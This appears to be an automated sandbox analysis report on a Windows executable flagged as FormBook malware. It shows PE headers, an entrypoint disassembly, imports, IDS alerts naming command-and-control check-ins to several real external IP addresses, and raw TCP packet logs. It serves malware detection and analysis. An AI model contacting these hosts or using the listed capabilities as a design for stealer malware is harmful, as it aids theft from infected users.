                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x67442143 [Mon Nov 25 07:03:31 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      call 00007F10BCCBD89Fh
                                                                                      jmp 00007F10BCCB08B4h
                                                                                      int3
                                                                                      int3
                                                                                      push edi
                                                                                      push esi
                                                                                      mov esi, dword ptr [esp+10h]
                                                                                      mov ecx, dword ptr [esp+14h]
                                                                                      mov edi, dword ptr [esp+0Ch]
                                                                                      mov eax, ecx
                                                                                      mov edx, ecx
                                                                                      add eax, esi
                                                                                      cmp edi, esi
                                                                                      jbe 00007F10BCCB0A3Ah
                                                                                      cmp edi, eax
                                                                                      jc 00007F10BCCB0D9Eh
                                                                                      bt dword ptr [004C0158h], 01h
                                                                                      jnc 00007F10BCCB0A39h
                                                                                      rep movsb
                                                                                      jmp 00007F10BCCB0D4Ch
                                                                                      cmp ecx, 00000080h
                                                                                      jc 00007F10BCCB0C04h
                                                                                      mov eax, edi
                                                                                      xor eax, esi
                                                                                      test eax, 0000000Fh
                                                                                      jne 00007F10BCCB0A40h
                                                                                      bt dword ptr [004BA370h], 01h
                                                                                      jc 00007F10BCCB0F10h
                                                                                      bt dword ptr [004C0158h], 00000000h
                                                                                      jnc 00007F10BCCB0BDDh
                                                                                      test edi, 00000003h
                                                                                      jne 00007F10BCCB0BEEh
                                                                                      test esi, 00000003h
                                                                                      jne 00007F10BCCB0BCDh
                                                                                      bt edi, 02h
                                                                                      jnc 00007F10BCCB0A3Fh
                                                                                      mov eax, dword ptr [esi]
                                                                                      sub ecx, 04h
                                                                                      lea esi, dword ptr [esi+04h]
                                                                                      mov dword ptr [edi], eax
                                                                                      lea edi, dword ptr [edi+04h]
                                                                                      bt edi, 03h
                                                                                      jnc 00007F10BCCB0A43h
                                                                                      movq xmm1, qword ptr [esi]
                                                                                      sub ecx, 08h
                                                                                      lea esi, dword ptr [esi+08h]
                                                                                      movq qword ptr [edi], xmm1
                                                                                      lea edi, dword ptr [edi+08h]
                                                                                      test esi, 00000007h
                                                                                      je 00007F10BCCB0A95h
                                                                                      bt esi, 03h
                                                                                      jnc 00007F10BCCB0AE8h
                                                                                      movdqa xmm1, dqword ptr [esi+00h]

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [ASM] VS2012 UPD4 build 61030
                                                                                      • [RES] VS2012 UPD4 build 61030
                                                                                      • [LNK] VS2012 UPD4 build 61030

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x59c5c.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x11e0000x6c4c.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0xc40000x59c5c0x59e001db49100f2c45021900588671d8f73ecFalse0.9285085622392212data7.898011344639996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x11e0000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0xc44a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                      RT_ICON0xc45c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                      RT_ICON0xc48b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                      RT_ICON0xc49d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                      RT_ICON0xc58800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                      RT_ICON0xc61280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                      RT_ICON0xc66900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                      RT_ICON0xc8c380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                      RT_ICON0xc9ce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                      RT_STRING0xca1480x594dataEnglishGreat Britain0.3333333333333333
                                                                                      RT_STRING0xca6dc0x68adataEnglishGreat Britain0.2747909199522103
                                                                                      RT_STRING0xcad680x490dataEnglishGreat Britain0.3715753424657534
                                                                                      RT_STRING0xcb1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                      RT_STRING0xcb7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                                                      RT_STRING0xcbe500x466dataEnglishGreat Britain0.3605683836589698
                                                                                      RT_STRING0xcc2b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                      RT_RCDATA0xcc4100x51331data1.0003337412392925
                                                                                      RT_GROUP_ICON0x11d7440x76dataEnglishGreat Britain0.6610169491525424
                                                                                      RT_GROUP_ICON0x11d7bc0x14dataEnglishGreat Britain1.15
                                                                                      RT_VERSION0x11d7d00xdcdataEnglishGreat Britain0.6181818181818182
                                                                                      RT_MANIFEST0x11d8ac0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                                      Imports

                                                                                      DLLImport
                                                                                      WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                      COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                      PSAPI.DLLGetProcessMemoryInfo
                                                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                      USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                      UxTheme.dllIsThemeActive
                                                                                      KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                      USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                      GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                      ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                      OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                                      Possible Origin

                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishGreat Britain

                                                                                      Network Behavior

                                                                                      Suricata IDS Alerts

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-12-02T14:31:14.937130+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649794154.215.72.11080TCP
                                                                                      2024-12-02T14:31:48.840215+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649874116.50.37.24480TCP
                                                                                      2024-12-02T14:33:12.635919+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64992885.159.66.9380TCP
                                                                                      2024-12-02T14:33:27.520840+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65002391.195.240.9480TCP
                                                                                      2024-12-02T14:33:50.947332+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65002766.29.149.4680TCP
                                                                                      2024-12-02T14:34:06.414054+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650033195.110.124.13380TCP
                                                                                      2024-12-02T14:34:38.079364+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650038217.196.55.20280TCP

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 2, 2024 14:31:13.222323895 CET4979480192.168.2.6154.215.72.110
                                                                                      Dec 2, 2024 14:31:13.342344999 CET8049794154.215.72.110192.168.2.6
                                                                                      Dec 2, 2024 14:31:13.342425108 CET4979480192.168.2.6154.215.72.110
                                                                                      Dec 2, 2024 14:31:13.345572948 CET4979480192.168.2.6154.215.72.110
                                                                                      Dec 2, 2024 14:31:13.465706110 CET8049794154.215.72.110192.168.2.6
                                                                                      Dec 2, 2024 14:31:14.936794996 CET8049794154.215.72.110192.168.2.6
                                                                                      Dec 2, 2024 14:31:14.937064886 CET8049794154.215.72.110192.168.2.6
                                                                                      Dec 2, 2024 14:31:14.937129974 CET4979480192.168.2.6154.215.72.110
                                                                                      Dec 2, 2024 14:31:14.940407991 CET4979480192.168.2.6154.215.72.110
                                                                                      Dec 2, 2024 14:31:15.060334921 CET8049794154.215.72.110192.168.2.6
                                                                                      Dec 2, 2024 14:31:39.216813087 CET4985380192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:39.336909056 CET8049853116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:39.336986065 CET4985380192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:39.339704990 CET4985380192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:39.459944010 CET8049853116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:40.857621908 CET8049853116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:40.857923985 CET8049853116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:40.858021021 CET4985380192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:40.883892059 CET4985380192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:41.888670921 CET4986080192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:42.009187937 CET8049860116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:42.009299040 CET4986080192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:42.011331081 CET4986080192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:42.131412029 CET8049860116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:43.526247978 CET4986080192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:43.593022108 CET8049860116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:43.593135118 CET4986080192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:43.593312979 CET8049860116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:43.593420029 CET4986080192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:43.646433115 CET8049860116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:43.646533966 CET4986080192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:44.544888020 CET4986780192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:44.664845943 CET8049867116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:44.664922953 CET4986780192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:44.666912079 CET4986780192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:44.786848068 CET8049867116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:44.786983967 CET8049867116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:46.182885885 CET4986780192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:46.276424885 CET8049867116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:46.276747942 CET8049867116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:46.276807070 CET4986780192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:46.276942968 CET4986780192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:46.302907944 CET8049867116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:46.303255081 CET4986780192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:47.200805902 CET4987480192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:47.321024895 CET8049874116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:47.321145058 CET4987480192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:47.323075056 CET4987480192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:47.444149017 CET8049874116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:48.839977980 CET8049874116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:48.840056896 CET8049874116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:31:48.840214968 CET4987480192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:48.890731096 CET4987480192.168.2.6116.50.37.244
                                                                                      Dec 2, 2024 14:31:49.010735989 CET8049874116.50.37.244192.168.2.6
                                                                                      Dec 2, 2024 14:32:03.106879950 CET4990980192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:03.227391958 CET804990985.159.66.93192.168.2.6
                                                                                      Dec 2, 2024 14:32:03.227483988 CET4990980192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:03.229765892 CET4990980192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:03.349879980 CET804990985.159.66.93192.168.2.6
                                                                                      Dec 2, 2024 14:32:04.744980097 CET4990980192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:04.866409063 CET804990985.159.66.93192.168.2.6
                                                                                      Dec 2, 2024 14:32:04.866476059 CET4990980192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:05.763633013 CET4991680192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:05.883717060 CET804991685.159.66.93192.168.2.6
                                                                                      Dec 2, 2024 14:32:05.883842945 CET4991680192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:05.889733076 CET4991680192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:06.009846926 CET804991685.159.66.93192.168.2.6
                                                                                      Dec 2, 2024 14:32:07.401437044 CET4991680192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:07.522074938 CET804991685.159.66.93192.168.2.6
                                                                                      Dec 2, 2024 14:32:07.522128105 CET4991680192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:08.421550989 CET4992280192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:08.541640997 CET804992285.159.66.93192.168.2.6
                                                                                      Dec 2, 2024 14:32:08.541843891 CET4992280192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:08.544080973 CET4992280192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:08.664047003 CET804992285.159.66.93192.168.2.6
                                                                                      Dec 2, 2024 14:32:08.664128065 CET804992285.159.66.93192.168.2.6
                                                                                      Dec 2, 2024 14:32:10.059390068 CET4992280192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:10.179766893 CET804992285.159.66.93192.168.2.6
                                                                                      Dec 2, 2024 14:32:10.180093050 CET4992280192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:11.084395885 CET4992880192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:11.204380989 CET804992885.159.66.93192.168.2.6
                                                                                      Dec 2, 2024 14:32:11.204479933 CET4992880192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:11.206867933 CET4992880192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:32:11.326894045 CET804992885.159.66.93192.168.2.6
                                                                                      Dec 2, 2024 14:33:12.634596109 CET804992885.159.66.93192.168.2.6
                                                                                      Dec 2, 2024 14:33:12.634659052 CET804992885.159.66.93192.168.2.6
                                                                                      Dec 2, 2024 14:33:12.635919094 CET4992880192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:33:12.686163902 CET4992880192.168.2.685.159.66.93
                                                                                      Dec 2, 2024 14:33:12.806246042 CET804992885.159.66.93192.168.2.6
                                                                                      Dec 2, 2024 14:33:18.083539009 CET5002080192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:18.203663111 CET805002091.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:18.204317093 CET5002080192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:18.206203938 CET5002080192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:18.326263905 CET805002091.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:19.528923988 CET805002091.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:19.529007912 CET805002091.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:19.529104948 CET5002080192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:19.714070082 CET5002080192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:20.737900972 CET5002180192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:20.857944965 CET805002191.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:20.858114958 CET5002180192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:20.860075951 CET5002180192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:20.980904102 CET805002191.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:22.182287931 CET805002191.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:22.182317972 CET805002191.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:22.182400942 CET5002180192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:22.370342016 CET5002180192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:23.389564037 CET5002280192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:23.509769917 CET805002291.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:23.509856939 CET5002280192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:23.511895895 CET5002280192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:23.632220030 CET805002291.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:23.632253885 CET805002291.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:24.791945934 CET805002291.195.240.94192.168.2.6
